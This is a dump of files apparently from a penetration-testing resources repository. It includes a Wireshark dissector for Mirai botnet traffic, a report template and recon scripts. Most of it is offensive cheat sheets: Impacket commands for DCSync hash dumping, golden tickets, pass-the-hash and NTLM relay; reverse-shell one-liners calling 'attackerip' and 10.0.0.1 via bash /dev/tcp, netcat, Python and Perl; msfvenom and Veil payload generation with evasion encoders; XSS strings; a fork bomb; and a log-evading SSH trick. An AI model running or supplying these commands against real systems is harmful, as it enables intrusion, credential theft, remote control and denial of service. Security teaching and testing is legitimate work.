| 133 | -- Target analysis 134 | local num_targets = buffer(offset, 1):uint() 135 | if num_targets > 0 and num_targets < 255 then 136 | subtree:add(f.num_targets, num_targets) 137 | offset = offset + 1 138 | 139 | local targets_tree = subtree:add(Mirai, buffer(offset), "Target Analysis") 140 | for i = 1, num_targets do --[[ NOTE(review): num_targets comes from the packet and nothing checks that offset + 7 <= buffer:len() before each 7-byte read, so a short packet raises a TvbRange out-of-bounds Lua error here. Guard with: if offset + 7 > buffer:len() then break end ]] 141 | local target_tree = targets_tree:add(Mirai, buffer(offset, 7), 142 | string.format("Target %d", i)) 143 | target_tree:add(f.target_ip, buffer(offset, 4)) 144 | target_tree:add(f.target_port, buffer(offset + 4, 2)) 145 | target_tree:add(f.target_subnet, 
buffer(offset + 6, 1)) 146 | offset = offset + 7 147 | end 148 | is_mirai = true 149 | end 150 | 151 | -- Payload analysis 152 | if offset < buffer:len() then 153 | local payload = buffer(offset):string() 154 | subtree:add(f.payload, buffer(offset)) 155 | 156 | if detect_http_pattern(payload) then 157 | subtree:add_proto_expert_info(f.expert_bot, "Mirai Bot HTTP Traffic") 158 | is_mirai = true 159 | end 160 | end 161 | end 162 | 163 | -- Set protocol column if Mirai activity detected 164 | if is_mirai then 165 | pinfo.cols.protocol = "MIRAI" 166 | pinfo.cols.info = "Mirai Botnet Traffic" 167 | return true 168 | end 169 | 170 | return false 171 | end 172 | 173 | -- Register for all relevant ports --[[ NOTE(review): DissectorTable:add() on tcp.port 80/443/53 and udp.port 53/443 overrides the built-in HTTP, TLS, DNS and QUIC dissectors for those ports while this plugin is loaded, so normal traffic stops decoding as those protocols. Keep the port-table registrations for the Mirai-specific ports only (48101, 37810, 35105, 61001) and attach to the well-known ports as a heuristic, which claims a packet only when the function returns true: Mirai:register_heuristic("tcp", Mirai.dissector) and Mirai:register_heuristic("udp", Mirai.dissector). ]] 174 | local tcp_table = DissectorTable.get("tcp.port") 175 | local udp_table = DissectorTable.get("udp.port") 176 | 177 | -- Known Mirai ports 178 | local ports = { 179 | 23, -- Telnet 180 | 48101, -- CNC 181 | 53, -- DNS 182 | 80, -- HTTP 183 | 443, -- HTTPS 184 | 37810, -- Additional CNC 185 | 5555, -- Common target 186 | 7547, -- Common target 187 | 35105, -- Scanner 188 | 61001 -- Scanner 189 | } 190 | 191 | -- Register for both TCP and UDP 192 | for _, port in ipairs(ports) do 193 | tcp_table:add(port, Mirai) 194 | udp_table:add(port, Mirai) 195 | end 196 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/impacket-cheatsheet.md: -------------------------------------------------------------------------------- 1 | 2 | ```bash 3 | #Primary Commands 4 | 5 | # Enumerate users in the Active Directory domain 6 | GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password 7 | 8 | # Retrieve users without pre-authentication enabled (AS_REP Roasting) 9 | GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john 10 | 11 | # Dump password hashes from a Windows machine using SMB protocol 12 | secretsdump.py -just-dc 
your-domain.local/your-user:your-password@10.0.0.2 13 | 14 | # Same DCSync dump, NTLM hashes only (-just-dc-ntlm skips the Kerberos keys). Neither -just-dc form reads LSASS: both pull the secrets from the DC's NTDS via DRSUAPI, which needs replication (DCSync) rights 15 | secretsdump.py -just-dc-ntlm your-domain.local/your-user:your-password@10.0.0.2 16 | 17 | # Remote execution on a target machine using WMI 18 | wmiexec.py your-domain.local/your-user:your-password@10.0.0.3 19 | 20 | # Remote execution on a target machine using SMB 21 | smbexec.py your-domain.local/your-user:your-password@10.0.0.4 22 | 23 | # Remote execution on a target machine using Task Scheduler 24 | atexec.py your-domain.local/your-user:your-password@10.0.0.5 cmd.exe 25 | 26 | # Remote execution on a target machine using DCOM 27 | dcomexec.py your-domain.local/your-user:your-password@10.0.0.6 cmd.exe 28 | 29 | # Enumerate shares and permissions on a target machine using SMB 30 | smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.7 31 | 32 | # Enumerate and retrieve group policy preferences from a domain controller 33 | gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local 34 | 35 | # Enumerate and retrieve group policy preferences from an SMB share 36 | gpprefdecrypt.py -s smb://10.0.0.8/sysvol -u your-user -p your-password -d your-domain.local 37 | 38 | # Forge a Kerberos TGT (golden ticket) for your-user from the krbtgt NT hash and the domain SID; ticketer.py writes a .ccache file, it does not enumerate existing tickets. Point KRB5CCNAME at that file before running the -k commands below 39 | ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user 40 | 41 | # Perform pass-the-hash attack with SMB and execute a command 42 | psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.9 cmd.exe 43 | 44 | # Pass-the-ticket: authenticate with the Kerberos ticket in KRB5CCNAME (-k -no-pass). Kerberos looks the service up by name, so give the target's hostname/FQDN rather than an IP and pass the address with -target-ip if name resolution is unavailable 45 | wmiexec.py -k -no-pass -target-ip 10.0.0.10 your-domain.local/your-user@target-host.your-domain.local cmd.exe 46 | 47 | 48 | #SMB and SQL Specific 49 | 50 | # Host a read-only SMB server on port 445 with the provided folder as the share 51 | smbserver.py -smb2support -username your-user -password your-password SHARE_NAME /path/to/folder 52 | 53 | # Host an SMB server with 
write access on a specific IP and port 54 | smbserver.py -smb2support -ip 10.0.0.1 -port 8445 -username your-user -password your-password -comment 'Writable Share' SHARE_NAME /path/to/folder 55 | 56 | # Connect to an SQL Server instance and execute a query (Windows Authentication) 57 | mssqlclient.py -windows-auth your-domain.local/your-user:your-password@10.0.0.2 58 | 59 | # Connect to an SQL Server instance and execute a query (SQL Server Authentication) 60 | mssqlclient.py -db your-database your-user:your-password@10.0.0.3 61 | 62 | # Connect to an SQL Server instance and enable xp_cmdshell 63 | mssqlclient.py your-domain.local/your-user:your-password@10.0.0.4 -enable-xp-cmdshell 64 | 65 | # Execute a command on the SQL Server using xp_cmdshell (once it's enabled) 66 | mssqlclient.py your-domain.local/your-user:your-password@10.0.0.5 -q 'EXEC xp_cmdshell "ipconfig"' 67 | 68 | # Perform an NTLM relay attack from an SMB server to a target machine 69 | ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server 70 | 71 | # Perform an NTLM relay attack from an SMB server to an LDAP server 72 | ntlmrelayx.py -t ldap://10.0.0.7 -smb2support -smbserver your-smb-server 73 | 74 | # Enumerate MSSQL instances using SQL Server Browser service 75 | mssqlinstance.py -ip 10.0.0.8 76 | 77 | # Test an MSSQL connection with a provided username and password 78 | mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.9 79 | 80 | 81 | #Top 10 Bug Bounty 82 | 83 | # 1. Enumerate users in the Active Directory domain 84 | GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password 85 | 86 | # 2. Retrieve users without pre-authentication enabled (AS_REP Roasting) 87 | GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john 88 | 89 | # 3. 
Dump password hashes from a Windows machine using SMB protocol (look for weak or reused passwords) 90 | secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2 91 | 92 | # 4. Enumerate shares and permissions on a target machine using SMB (identify misconfigured shares) 93 | smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.3 94 | 95 | # 5. Enumerate and retrieve group policy preferences from a domain controller (look for hardcoded credentials) 96 | gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local 97 | 98 | # 6. Enumerate Kerberos tickets from a machine using Kerberos protocol (identify misconfigurations or vulnerabilities) 99 | ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user 100 | 101 | # 7. Perform pass-the-hash attack with SMB and execute a command (escalate privileges) 102 | psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.4 cmd.exe 103 | 104 | # 8. Connect to an SQL Server instance and execute a query (identify SQL Server misconfigurations or vulnerabilities) 105 | mssqlclient.py -db your-database your-user:your-password@10.0.0.5 106 | 107 | # 9. Perform an NTLM relay attack from an SMB server to a target machine (exploit misconfigured SMB signing) 108 | ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server 109 | 110 | # 10. 
Test an MSSQL connection with a provided username and password (identify weak or reused credentials) 111 | mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.7 112 | ``` 113 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/reverse-shells.md: -------------------------------------------------------------------------------- 1 | ## Reverse Shell OneLiners 2 | Spawn, catch & upgrade reverse shells 3 | 4 | 5 | ### Reverse Shells 6 | 7 | #### **Bash** 8 | 9 | ```bash 10 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 11 | ``` 12 | 13 | **Alternatives for Bash shell:** 14 | 15 | ```bash 16 | exec /bin/bash 0&0 2>&0 17 | ``` 18 | 19 | ```bash 20 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 21 | ``` 22 | 23 | ```bash 24 | exec 5<>/dev/tcp/attackerip/4444 25 | cat <&5 | while read line; do $line 2>&5 >&5; done # or: 26 | while read line 0<&5; do $line 2>&5 >&5; done 27 | ``` 28 | 29 | 30 | #### **PERL** 31 | 32 | ```perl 33 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 34 | ``` 35 | 36 | **Shorter Perl reverse shell that does not depend on /bin/sh:** 37 | 38 | ```perl 39 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 40 | ``` 41 | 42 | **If the target system is running Windows use the following one-liner:** 43 | 44 | ```perl 45 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 46 | ``` 47 | 48 | 49 | #### **Python** 50 | 51 | ```python 52 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 53 | ``` 54 | 55 | 56 | #### **PHP** 57 | 58 | ```php 59 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 60 | ``` 61 | 62 | 63 | #### **Ruby** 64 | 65 | ```ruby 66 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 67 | ``` 68 | 69 | Longer Ruby reverse shell that does not depend on /bin/sh: 70 | 71 | ```ruby 72 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 73 | ``` 74 | 75 | If the target system is running Windows use the following one-liner: 76 | 77 | ```ruby 78 | ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 79 | ``` 80 | 81 | 82 | #### **Netcat** 83 | 84 | Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. 
85 | 86 | ```bash 87 | nc -e /bin/sh 10.0.0.1 1234 88 | ``` 89 | 90 | If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: 91 | 92 | ```bash 93 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 94 | ``` 95 | 96 | Other nc alternatives: 97 | 98 | ```bash 99 | nc -c /bin/sh attackerip 4444 100 | ``` 101 | 102 | ```bash 103 | /bin/sh | nc attackerip 4444 104 | ``` 105 | 106 | ```bash 107 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 108 | ``` 109 | 110 | 111 | #### **Java** 112 | 113 | ```java 114 | r = Runtime.getRuntime() 115 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 116 | p.waitFor() 117 | ``` 118 | 119 | 120 | #### **Telnet** 121 | 122 | ```bash 123 | rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 124 | ``` 125 | 126 | ```bash 127 | telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp 128 | ``` 129 | 130 | 131 | #### **xterm** 132 | 133 | The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. 134 | 135 | 136 | ``` 137 | xterm -display 10.0.0.1 138 | ``` 139 | *Or:* 140 | 141 | ``` 142 | $ DISPLAY=attackerip:0 xterm 143 | ``` 144 | 145 | To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). 
One way to do this is with Xnest (to be run on your system): 146 | 147 | ``` 148 | Xnest :1 149 | ``` 150 | 151 | You’ll need to authorise the target to connect to you (command also run on your host): 152 | 153 | ``` 154 | xhost +targetip 155 | ``` 156 | 157 | Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath: 158 | 159 | ``` 160 | /usr/openwin/bin/xterm -display attackerip:1 161 | ``` 162 | --- 163 | 164 | ## Shell Upgrades 165 | 166 | #### Method 1: Python pty module 167 | 168 | ```bash 169 | python -c 'import pty; pty.spawn("/bin/bash")' 170 | ``` 171 | 172 | #### Method 2: Using socat 173 | 174 | On attack machine (listen): 175 | 176 | ```bash 177 | socat file:\`tty\`,raw,echo=0 tcp-listen:4444 178 | ``` 179 | 180 | On Victim (launch): 181 | 182 | ```bash 183 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 184 | ``` 185 | 186 | #### Method 3: Upgrading from netcat with magic 187 | 188 | In reverse shell: 189 | 190 | ```bash 191 | python -c 'import pty; pty.spawn("/bin/bash")' 192 | ``` 193 | 194 | On attack machine: 195 | 196 | ```bash 197 | stty raw -echo 198 | fg 199 | ``` 200 | 201 | In reverse shell: 202 | 203 | ```bash 204 | reset 205 | export SHELL=bash 206 | export TERM=xterm-256color 207 | stty rows columns 208 | ``` 209 | 210 | #### Method 4: Using script 211 | 212 | ```bash 213 | script -qc /bin/bash /dev/null 214 | ``` 215 | 216 | #### Method 5: Using Other Scripting Languages 217 | 218 | Perl: 219 | 220 | ```perl 221 | perl -e 'exec "/bin/sh";' 222 | ``` 223 | 224 | Ruby: 225 | 226 | ```ruby 227 | ruby -e 'exec "/bin/sh"' 228 | ``` 229 | 230 | Lua: 231 | 232 | ```lua 233 | lua -e "os.execute('/bin/sh')" 234 | ``` 235 | 236 | #### Method 6: Using socat one-liner 237 | 238 | ```bash 239 | wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash 
-li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444 240 | ``` 241 | 242 | #### Method 7: Using Expect 243 | 244 | Create a script called sh.exp: 245 | 246 | ```bash 247 | #!/usr/bin/expect 248 | spawn sh 249 | interact 250 | ``` 251 | 252 | Then, execute this script on the victim machine. 253 | 254 | #### Method 8: Using rlwrap 255 | 256 | ```bash 257 | rlwrap nc -lvnp 258 | ``` 259 | 260 | — 261 | 262 | #### References 263 | 264 | 265 | ``` 266 | 267 | 1. Reverse Shell Cheat Sheet | pentestmonkey. (n.d.). https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 268 | 269 | 2. Reverse shells one-liners. (n.d.). https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html?m=1 270 | 271 | 3. ropnop blog. https:// blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ 272 | 273 | 4. zweilosec. https://zweilosec.github.io/posts/upgrade-linux-shell/ 274 | 275 | 5. 0xffsec. https://0xffsec.com/handbook/shells/full-tty/ 276 | 277 | ``` -------------------------------------------------------------------------------- /resources/payload-cheatsheets/veil-venom-shells.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | # MSVenom payloads 4 | 5 | # Windows Reverse TCP Meterpreter 6 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o reverse_meterpreter.exe 7 | 8 | # Linux Reverse TCP Meterpreter 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o reverse_meterpreter.elf 10 | 11 | # macOS Reverse TCP Meterpreter 12 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho -o reverse_shell.macho 13 | 14 | # Android Reverse TCP Meterpreter 15 | msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o reverse_meterpreter.apk 16 | 17 | # PHP Reverse TCP Meterpreter 18 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw -o reverse_shell.php 19 | 20 | # Generate a Windows x86 reverse shell payload in the Powershell format 21 | msfvenom -p 
windows/shell_reverse_tcp LHOST= LPORT= -f powershell -o reverse_shell.ps1 22 | 23 | # Generate a Linux x86 bind shell payload in the Python format 24 | msfvenom -p linux/x86/shell/bind_tcp LPORT= -f python -o bind_shell.py 25 | 26 | # Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy 27 | msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST= LPORT= -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080 28 | 29 | # Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4 30 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f exe -o reverse_meterpreter.exe ENCODING=rc4 31 | 32 | 33 | # Veil payloads 34 | 35 | # Generate a custom payload with a specific name and set of evasion techniques 36 | python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5' 37 | 38 | # Generate a payload with a custom shellcode encoder 39 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed' 40 | 41 | # Generate a payload with custom obfuscation options 42 | python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated' 43 | 44 | # Generate a payload with an encrypted communication channel 45 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C :' 46 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/xss-strings.md: -------------------------------------------------------------------------------- 1 | Standard JS 2 | 3 | ```js 4 | 5 | '', 6 | '', 7 | '", 35 | "', 36 | '', 37 | '', 38 | '', 39 | '', 40 | '', 41 | ``` 42 | Actions 43 | ```js 44 | '">', 45 | '">', 46 | '" autofocus onfocus=alert("XSS")>', 47 | '" onclick=alert("XSS)//', 48 | '" ondblclick=alert("XSS")>', 49 | '" 
onfocus=alert(document.domain)>', 50 | '">', 51 | '">', 52 | '">">', 53 | '" onmouseover=alert("XSS")> ', 55 | '">', 56 | '">', 57 | '">
', 58 | '', 59 | ``` 60 | Images 61 | ```js 62 | '">', 63 | '', 64 | '', 65 | '', 66 | '', 67 | '', 68 | '', 69 | '', 70 | 71 | -------------------------------------------------------------------------------- /resources/readme.md: -------------------------------------------------------------------------------- 1 | **First, visit the [Checklists, Cheatsheets & Resources](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/repos/repos-main.md#reference) with guides and reports.** 2 | 3 | ## Helpful Oneliners 4 | 5 | ### Recon 6 | 7 | List all nmap NSE scripts 8 | ```bash 9 | ls /usr/share/nmap/scripts | sed ‘s/\.nse$//‘ | sort 10 | ``` 11 | 12 | ### Exploit 13 | 14 | ”Linux Fork Bomb” - Create processes until the system “crashes” 15 | ```bash 16 | :(){ :|: & };: 17 | ``` 18 | 19 | ### C2 & PostOP 20 | 21 | ”Almost Invisible SSH” - This will not add your user to the /var/log/utmp file and you won’t show up in w or who command of logged in users. It will bypass profile and bash profile as well. On your client side it will stop logging the host name to 22 | ```bash 23 | ~/.ssh/known_hosts.* Credit: netmux 24 | ssh -o UserKnownHostsFile=/dev/null -T user@example. com “bash -¡” 25 | ``` 26 | 27 | Delete empty files in folder 28 | ```bash 29 | alias rm0=“find . -madepth 1 -size 0 -delete -print” 30 | ``` 31 | 32 | Cleanup old docker containers 33 | ```bash 34 | #!/bin/bash 35 | 36 | sudo docker stop $(sudo docker ps -aq) 37 | sudo docker rm $(sudo docker ps -aq) 38 | sudo docker rmi $(sudo docker images -q) 39 | sudo docker volume rm $(sudo docker volume ls -q) 40 | sudo docker network rm $(sudo docker network ls -q) 41 | ``` 42 | 43 | ## Tools 44 | 45 | [One-Lin3r](https://github.com/D4Vinci/One-Lin3r) one-liner tool for common commands 46 | 47 | 48 | 49 | For attribution, if not properly cited let me know. Contributions welcome. 
50 | -------------------------------------------------------------------------------- /resources/reporting/external_test_template.md: -------------------------------------------------------------------------------- 1 | # Report Template 2 | 3 | ## **Penetration Testing Report** 4 | 5 | **Client:** ACME Corporation 6 | 7 | **Date:** March 20, 2023 8 | 9 | **Performed by:** RDD Penetration Testing Team 10 | 11 | ### **1. Executive Summary** 12 | 13 | The purpose of this penetration test was to assess the security posture of ACME Corporation's external network and web applications. The test was conducted using industry-standard methodologies and tools. Overall, the security posture of the organization is good, but a few critical and high-risk vulnerabilities were identified, which require immediate attention to prevent potential exploitation and business impact. 14 | 15 | ### **2. Technical Summary** 16 | 17 | The penetration test was conducted using a combination of automated scanning tools, manual testing techniques, and vulnerability exploitation. The testing methodology followed the six-step process outlined in the RDD Penetration Testing Playbook: 18 | 19 | 1. Open Source Intelligence (OSINT) 20 | 2. Enumeration and Fuzzing 21 | 3. Vulnerability Assessment 22 | 4. Exploitation 23 | 5. Privilege Escalation 24 | 6. Reporting 25 | 26 | ### **3. Findings and Risk Ratings** 27 | 28 | | Finding ID | Vulnerability | Risk Rating | Affected System | 29 | | --- | --- | --- | --- | 30 | | F-001 | SQL Injection | High | Web Application | 31 | | F-002 | Unsecured S3 Bucket | Critical | Cloud Environment | 32 | | F-003 | Weak Password | Medium | Network Device | 33 | | F-004 | Outdated SSL/TLS | Medium | Web Server | 34 | 35 | ### **4. Mitigation Strategies** 36 | 37 | **F-001: SQL Injection** 38 | 39 | - Validate and sanitize user input to prevent malicious SQL code from being executed. 
40 | - Use parameterized queries, prepared statements, or stored procedures to separate SQL code from data. 41 | - Implement a Web Application Firewall (WAF) to detect and block SQL injection attempts. 42 | 43 | **F-002: Unsecured S3 Bucket** 44 | 45 | - Restrict public access to the S3 bucket by updating the bucket policy. 46 | - Enable server-side encryption for data stored in the bucket. 47 | - Implement a logging and monitoring solution to detect unauthorized access to the bucket. 48 | 49 | **F-003: Weak Password** 50 | 51 | - Enforce a strong password policy, including minimum length, complexity, and expiration requirements. 52 | - Implement multi-factor authentication (MFA) for administrative access to network devices. 53 | - Regularly audit user accounts and passwords to identify weak or reused passwords. 54 | 55 | **F-004: Outdated SSL/TLS** 56 | 57 | - Update the web server to support the latest TLS version (e.g., TLS 1.3). 58 | - Disable weak ciphers and use strong cipher suites recommended by industry standards. 59 | - Regularly review and update SSL/TLS configurations to maintain compliance with best practices. 
60 | -------------------------------------------------------------------------------- /resources/reporting/img/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/reporting/img/rootdown_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/52021c46aa1176fcd188b489ed90117046a94bf3/resources/reporting/img/rootdown_logo.png -------------------------------------------------------------------------------- /scripts/automation/AppendToNotion.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set NOTION_TOKEN and NOTION_DATABASE_ID 4 | # Note: Assumes there is subdomains.txt 5 | # also assumes your Notion database has 6 | # a Name property for the subdomain and a Date Added property 7 | 8 | NOTION_TOKEN="your_notion_token" 9 | NOTION_DATABASE_ID="your_database_id" 10 | 11 | # Get the current date and time 12 | current_date=$(date '+%Y-%m-%d %H:%M:%S') 13 | 14 | # Loop through the txt file 15 | while IFS= read -r subdomain 16 | do 17 | # Prepare the data to be sent to Notion 18 | data=$(cat < /dev/null; then 16 | echo "$tool is required but not installed. Please install it first." 
17 | exit 1 18 | fi 19 | done 20 | 21 | # Run the command and append the results to the output file 22 | subfinder -d $domain -silent | assetfinder --subs-only | httprobe -c 50 | tee temp_urls.txt | { while read url; do echo $url | waybackurls; echo $url | hakrawler; done } | sort -u | anew $output_file && rm temp_urls.txt 23 | # Check if a cron job for this script already exists 24 | cron_job_exists=$(crontab -l | grep -F "$0 $domain $output_file") 25 | 26 | if [ -n "$cron_job_exists" ]; then 27 | # Ask the user if they want to remove the existing cron job 28 | read -p "A cron job for this script already exists. Do you want to remove it? (y/n) " -n 1 -r 29 | echo 30 | if [[ $REPLY =~ ^[Yy]$ ]]; then 31 | # Remove the existing cron job 32 | (crontab -l | grep -vF "$0 $domain $output_file") | crontab - 33 | fi 34 | else 35 | # Ask the user if they want to register this script as a cron job 36 | read -p "Do you want to register this script as a cron job? (y/n) " -n 1 -r 37 | echo 38 | if [[ $REPLY =~ ^[Yy]$ ]]; then 39 | # Ask the user for the frequency of the cron job 40 | PS3='Please enter your choice: ' 41 | options=("Hourly" "Daily" "Weekly" "Quit") 42 | select opt in "${options[@]}" 43 | do 44 | case $opt in 45 | "Hourly") 46 | (crontab -l ; echo "0 * * * * $0 $domain $output_file") | crontab - 47 | break 48 | ;; 49 | "Daily") 50 | (crontab -l ; echo "0 0 * * * $0 $domain $output_file") | crontab - 51 | break 52 | ;; 53 | "Weekly") 54 | (crontab -l ; echo "0 0 * * 0 $0 $domain $output_file") | crontab - 55 | break 56 | ;; 57 | "Quit") 58 | break 59 | ;; 60 | *) echo "invalid option $REPLY";; 61 | esac 62 | done 63 | fi 64 | fi 65 | -------------------------------------------------------------------------------- /scripts/automation/CyberRecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################## 4 | # CyberRecon.sh 5 | # Comprehensive Cybersecurity 
Reconnaissance Script 6 | # 7 | # Description: 8 | # This script performs a detailed cybersecurity reconnaissance and scanning 9 | # for a given target domain. It integrates various tools to enumerate 10 | # subdomains, analyze DNS, scan web endpoints, identify vulnerabilities, 11 | # and perform port scanning. The results are compiled into a report, 12 | # and notifications are sent via Discord. 13 | # 14 | # Usage: 15 | # ./CyberRecon.sh 16 | # Example: ./CyberRecon.sh example.com 17 | # 18 | # Output: 19 | # All findings are stored in a target-specific directory under ./scans/. 20 | # A final report is compiled in the same directory for easy review. 21 | # 22 | # Prerequisites: 23 | # - Ensure all required tools (amass, subfinder, github-subdomains, etc.) are installed. 24 | # - Set the 'DISCORD_WEBHOOK_URL' to your Discord webhook for notifications. 25 | # 26 | # Author: @lukeswitz 27 | # Created: 22_DEC_2023 28 | # Last Updated: 22_DEC_2023 29 | ########################################################## 30 | 31 | # Check for input parameter 32 | if [ "$#" -ne 1 ]; then 33 | echo "Usage: $0 " 34 | exit 1 35 | fi 36 | 37 | TARGET_DOMAIN="$1" 38 | DISCORD_WEBHOOK_URL="your_discord_webhook_url" 39 | 40 | # Directory setup for new target 41 | WORKING_DIR="./scans/$TARGET_DOMAIN" 42 | mkdir -p $WORKING_DIR 43 | 44 | # Output files setup 45 | SUBDOMAINS_FILE="$WORKING_DIR/subdomains.txt" 46 | DNS_ANALYSIS_FILE="$WORKING_DIR/dns_analysis.txt" 47 | WEB_ENDPOINTS_FILE="$WORKING_DIR/web_endpoints.txt" 48 | VULNERABILITY_FILE="$WORKING_DIR/vulnerabilities.txt" 49 | PORT_ENUM_FILE="$WORKING_DIR/port_enum.txt" 50 | FINAL_REPORT="$WORKING_DIR/final_report.txt" 51 | 52 | # Function to Notify via Discord 53 | notify_discord() { 54 | curl -H "Content-Type: application/json" -d "{\"content\": \"$1\"}" $DISCORD_WEBHOOK_URL 55 | } 56 | 57 | # Clearing previous data 58 | > $SUBDOMAINS_FILE 59 | > $DNS_ANALYSIS_FILE 60 | > $WEB_ENDPOINTS_FILE 61 | > $VULNERABILITY_FILE 62 | > 
$PORT_ENUM_FILE 63 | > $FINAL_REPORT 64 | 65 | # Domain and Subdomain Enumeration 66 | echo "Starting Domain and Subdomain Enumeration..." 67 | amass enum -d $TARGET_DOMAIN -o $WORKING_DIR/amass.txt 68 | subfinder -d $TARGET_DOMAIN -o $WORKING_DIR/subfinder.txt 69 | github-subdomains -d $TARGET_DOMAIN -o $WORKING_DIR/githubsubdomains.txt 70 | findomain -t $TARGET_DOMAIN -o $WORKING_DIR/findomain.txt 71 | assetfinder --subs-only $TARGET_DOMAIN | tee $WORKING_DIR/assetfinder.txt 72 | 73 | # Combine and sort the results 74 | cat $WORKING_DIR/*.txt | sort -u > $SUBDOMAINS_FILE 75 | 76 | # DNS Analysis and History 77 | echo "Starting DNS Analysis and History..." 78 | rapid_dns -d $TARGET_DOMAIN | tee -a $DNS_ANALYSIS_FILE 79 | crt.sh -d $TARGET_DOMAIN | tee -a $DNS_ANALYSIS_FILE 80 | dnsx -l $SUBDOMAINS_FILE -o $WORKING_DIR/dnsx.txt 81 | massdns -r lists/resolvers.txt -t A -o S -w $WORKING_DIR/massdns.txt $SUBDOMAINS_FILE 82 | puredns bruteforce subdomains-top1million.txt $TARGET_DOMAIN --resolvers lists/resolvers.txt 